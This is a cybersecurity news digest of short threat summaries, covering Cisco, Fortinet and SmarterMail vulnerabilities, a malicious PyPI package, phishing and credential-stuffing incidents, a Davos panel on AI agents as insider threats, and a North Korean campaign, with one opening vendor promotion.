Daily Brief

Fast-growing companies often face challenges in securing Google Workspace due to inherited tech stacks focused on growth rather than resilience. Google Workspace offers a strong security foundation, but its native tools have limitations, particularly in handling targeted threats and sophisticated social engineering. Multi-factor authentication (MFA) is crucial, but organizations must extend access control beyond just login credentials to prevent unauthorized access. Material Security enhances Google Workspace by providing advanced email protection, leveraging AI and custom rules to detect and remediate complex threats. The platform offers context-aware security, monitoring cloud office activities to detect and prevent account takeovers and suspicious behaviors. Material also addresses gaps in data protection by automatically classifying sensitive data and enforcing file-sharing policies without hindering collaboration. A free Google Workspace Security Scorecard is available, offering a quick assessment and actionable recommendations to improve security posture for various organizational roles.

Cisco has issued a critical patch for a zero-day vulnerability in its Unified Communications systems, which is actively being exploited in the wild. The flaw, identified as CVE-2026-20045, affects multiple Cisco platforms, including Unified Communications Manager and Webex Calling Dedicated Instance. This vulnerability allows unauthenticated remote attackers to execute arbitrary code and potentially gain root access, posing a severe risk of full system compromise. Cisco's Product Security Incident Response Team has prioritized this flaw due to its potential impact, despite a "High" CVSS score. The vulnerability arises from improper validation of user input in HTTP requests, making it exploitable without authentication. CISA has added this flaw to its Known Exploited Vulnerabilities list, urging immediate patching across federal agencies and other users. No workarounds are available, making timely patch application crucial to prevent exploitation. This incident follows closely on the heels of another critical patch for Cisco's Secure Email products, indicating ongoing challenges in securing their software.

A malicious package named sympy-dev was discovered on PyPI, impersonating the legitimate SymPy library to deploy harmful payloads on Linux hosts. The package has been downloaded over 1,100 times since its release, indicating potential widespread impact among developers. The malicious package modifies the original library to act as a downloader for the XMRig cryptocurrency miner, targeting specific polynomial routines to remain undetected. When triggered, the backdoored functions download a remote JSON configuration and an ELF payload, executing them in memory to avoid leaving disk artifacts. This attack method mirrors techniques used in past cryptojacking campaigns by groups like FritzFrog and Mimo, focusing on CPU mining while disabling GPU backends. The campaign directs mining activities to Stratum over TLS endpoints on port 3333, using threat actor-controlled IP addresses for operations. The Python implant serves as a versatile loader capable of executing arbitrary second-stage code, posing a broader threat beyond cryptomining. Organizations should review and monitor their use of PyPI packages to prevent similar threats and consider implementing security measures to detect such malicious activities.

A critical authentication bypass vulnerability in SmarterMail was actively exploited just two days after a patch was released on January 15, 2026. The flaw, tracked as WT-2026-0001, allows attackers to reset administrator passwords and execute operating system commands via crafted HTTP requests. Despite the patch, attackers reverse-engineered the fix, exploiting the vulnerability through the "/api/v1/auth/force-reset-password" endpoint. The exploitation highlights the risk of vague release notes, as SmarterMail's documentation lacked specific details on the addressed issues. SmarterTools plans to enhance transparency by notifying users via email about new CVEs and their resolutions, following customer feedback. The incident follows a recent disclosure of another severe SmarterMail flaw by the Cyber Security Agency of Singapore, emphasizing ongoing security challenges. Organizations using SmarterMail should ensure they have applied the latest patches and monitor for unusual account activities to mitigate potential threats.

Arctic Wolf identified a new wave of automated attacks targeting Fortinet FortiGate devices, exploiting SSO vulnerabilities to alter firewall configurations and create persistent access. The attacks began on January 15, 2026, sharing characteristics with a December 2025 campaign that exploited CVE-2025-59718 and CVE-2025-59719. These vulnerabilities enable unauthenticated bypass of SSO login authentication via crafted SAML messages when FortiCloud SSO is active. Impacted products include FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager, with threat actors creating secondary accounts for sustained access. Malicious SSO logins were traced to a specific account, "cloud-init@mail.io," from four IP addresses, with firewall configurations exfiltrated to these addresses. The rapid execution of these actions suggests a high level of automation in the attack process. Users on Reddit reported similar unauthorized logins on fully-patched devices, with Fortinet acknowledging the issue remains unresolved in version 7.4.10. As a precaution, disabling the "admin-forticloud-sso-login" setting is recommended until a patch is available.

Cisco has issued patches for a critical zero-day vulnerability, CVE-2026-20045, affecting Unified Communications products and Webex Calling, which has been exploited in the wild. The flaw, with a CVSS score of 8.2, allows unauthenticated remote attackers to execute arbitrary commands and escalate privileges to root on affected systems. Exploitation is possible through crafted HTTP requests targeting the web-based management interface, due to improper input validation. Impacted products include Cisco Unified CM, CM SME, CM IM&P, Webex Calling Dedicated Instance, and Cisco Unity Connection. Cisco urges customers to upgrade to the fixed software release immediately, as no workarounds are available for this vulnerability. The U.S. CISA has added CVE-2026-20045 to its Known Exploited Vulnerabilities catalog, mandating Federal Civilian Executive Branch agencies to apply fixes by February 11, 2026. This discovery follows another critical vulnerability update for Cisco Secure Email products, underscoring the ongoing need for vigilance in patch management.

A global spam wave has exploited unsecured Zendesk support systems, impacting numerous companies and generating hundreds of confusing emails for recipients. The spam campaign began on January 18th, targeting users worldwide with bizarre and sometimes alarming email subjects. Attackers abused Zendesk's open ticket submission feature, turning it into a mass-spam platform by creating fake support tickets. Affected organizations include Discord, Tinder, Riot Games, Dropbox, and several others, with emails bypassing traditional spam filters. Despite the emails lacking malicious links, their volume and nature have caused concern among recipients, leading companies to reassure users. Zendesk has implemented new safety features to detect and mitigate such spam activities, emphasizing the need for verified user restrictions. Companies are advised to restrict ticket creation to verified users to prevent similar abuses in the future.

At Davos, cybersecurity experts discussed the potential risks AI agents pose as insider threats, emphasizing the need for robust security measures to manage these digital entities effectively. Pearson's CTO, Dave Treat, highlighted the dual challenge of training both humans and AI agents to prevent cyberattacks, as AI agents become more integrated into business operations. Panelists advocated for implementing zero trust and least-privilege access models to mitigate risks associated with AI agents accessing sensitive data or systems. Cloudflare's Michelle Zatlyn suggested treating AI agents as extensions of the workforce, necessitating similar security protocols as those for human employees. Hatem Dowidar from e& proposed establishing guardrails and monitoring systems for AI agents, akin to recording calls for quality assurance in human interactions. Mastercard CEO Michael Miebach recommended leveraging threat-intelligence practices from the banking sector, using comprehensive data signals to assess AI agent activities. The discussion underscored the importance of intelligent networks and continuous monitoring to detect and isolate malicious behaviors facilitated by AI technologies.

Two critical vulnerabilities, CVE-2026-22218 and CVE-2026-22219, were discovered in Chainlit, affecting AI systems in multiple sectors, including large enterprises and academic institutions. The vulnerabilities, named 'ChainLeak', allow arbitrary file reading and server-side request forgery, posing significant risks to internet-facing AI deployments. CVE-2026-22218 enables attackers to read sensitive files on the server, such as API keys and cloud credentials, without user interaction. CVE-2026-22219 allows attackers to exploit SQLAlchemy deployments by forcing servers to fetch and store data from specified URLs, potentially accessing internal services. Zafran Labs researchers demonstrated that these flaws could be combined for full-system compromise and lateral movement within cloud environments. Chainlit maintainers were notified on November 23, 2025, with a fix released on December 24, 2025, in version 2.9.4. Organizations are urged to update to the latest version. The vulnerabilities impact approximately 700,000 monthly downloads, emphasizing the urgent need for security updates in AI frameworks.

Cisco has resolved a critical remote code execution vulnerability in its Unified Communications and Webex Calling platforms, identified as CVE-2026-20045, which was actively exploited in the wild. The flaw affects multiple Cisco products, including Unified Communications Manager and Webex Calling Dedicated Instance, due to improper validation of user input in HTTP requests. Successful exploitation could grant attackers root access to affected systems, posing significant security risks to organizations relying on these communication tools. Cisco has released specific software updates and patches to mitigate the vulnerability, advising customers to review README files before application. No workarounds are available, making immediate patch deployment essential for securing affected systems against potential exploits. The U.S. Cybersecurity and Infrastructure Security Agency has added this vulnerability to its Known Exploited Vulnerabilities Catalog, mandating federal agencies update by February 11, 2026. This incident follows recent patches by Cisco for other vulnerabilities, emphasizing the ongoing need for vigilance and timely updates in cybersecurity practices.

A new Android malware family uses TensorFlow machine learning to execute click fraud by interacting with hidden browser ads, bypassing traditional JavaScript routines. The malware employs TensorFlow.js, enabling AI models to run in browsers, enhancing its adaptability to dynamic ad environments. Distributed through Xiaomi's GetApps and third-party sites, the malware initially appears benign, receiving malicious updates post-installation. The trojans operate in 'phantom' and 'signalling' modes, using virtual screens and live video feeds to automate ad interactions and mimic user behavior. Infected apps include altered versions of popular apps like Spotify and Netflix, distributed via APK sites and Telegram channels, increasing their reach. While the malware does not directly threaten user privacy, it leads to battery drain, device wear, and higher data charges, impacting user experience. Users are advised to avoid non-Google Play app installations and be cautious of apps offering free premium features to mitigate risks.

PcComponentes, a leading Spanish technology retailer, refuted claims of a data breach affecting 16 million customers but confirmed a credential stuffing attack on its platform. The alleged breach involved a threat actor leaking 500,000 records and offering to sell 16.3 million records, including personal and order details, to the highest bidder. PcComponentes' investigation found no unauthorized access to its databases, asserting the number of affected accounts is far lower than claimed. The attack leveraged email addresses and passwords from previous breaches, with Hudson Rock identifying compromised credentials from info-stealing malware logs. In response, PcComponentes implemented CAPTCHA on login pages, enforced two-factor authentication (2FA), and invalidated all active sessions to enhance security. Customers are advised to use strong, unique passwords, employ password managers, and remain alert to phishing threats. The incident underscores the ongoing risk of credential stuffing attacks and the importance of robust security measures for online platforms.

LastPass has alerted users to a phishing campaign falsely claiming urgent action is needed for scheduled maintenance, aiming to steal master passwords. Emails began circulating around January 19, urging users to back up their vaults within 24 hours, a tactic to create urgency. The phishing emails redirect victims to a malicious site, attempting to capture master passwords, potentially exposing sensitive stored credentials. LastPass vaults hold critical personal information, making them attractive targets for financial and identity fraud. The company is collaborating with third-party partners to dismantle malicious domains and protect users from this scam. Previous phishing attempts included deceptive tactics, such as emails sent during holidays to delay detection and response. LastPass has provided a list of malicious URLs, IP addresses, and email addresses to aid in threat hunting and prevention efforts.

Fortinet firewalls are experiencing exploitation through a bypass of a previously patched critical authentication vulnerability, CVE-2025-59718, affecting multiple FortiGate versions. Administrators report unauthorized admin account creation via malicious SAML messages, indicating the vulnerability persists in FortiOS version 7.4.10. Fortinet plans to release updated versions 7.4.11, 7.6.6, and 8.0.0 to address the ongoing security flaw comprehensively. Administrators are advised to disable the vulnerable FortiCloud SSO feature temporarily to mitigate the risk of unauthorized access. Over 25,000 Fortinet devices were initially exposed online with FortiCloud SSO enabled; this number has been reduced to approximately 11,000. CISA has mandated federal agencies to patch the CVE-2025-59718 vulnerability within a week due to active exploitation. A separate critical vulnerability in Fortinet FortiSIEM is also being targeted, with proof-of-concept exploit code available for attackers.

Recorded Future's Insikt Group identified the North Korean PurpleBravo campaign targeting 3,136 IP addresses, affecting 20 organizations across AI, cryptocurrency, and financial sectors. The campaign, active from August 2024 to September 2025, targeted companies in Europe, South Asia, the Middle East, and Central America, posing significant cyber espionage and financial theft risks. Attackers used malicious Microsoft Visual Studio Code projects and LinkedIn personas to distribute malware, exploiting trusted developer workflows for infiltration. PurpleBravo managed two command-and-control server sets for malware distribution, using Astrill VPN and IP ranges in China for operational security. The campaign's tactics overlap with another North Korean operation, Wagemole, which involves IT workers seeking unauthorized employment for espionage and financial gain. Victims executing malicious code on corporate devices increased organizational exposure, highlighting vulnerabilities in IT software supply chains to North Korean adversaries. Organizations outsourcing work to affected regions face heightened supply-chain risks, necessitating enhanced defenses against data leakage to North Korean threat actors.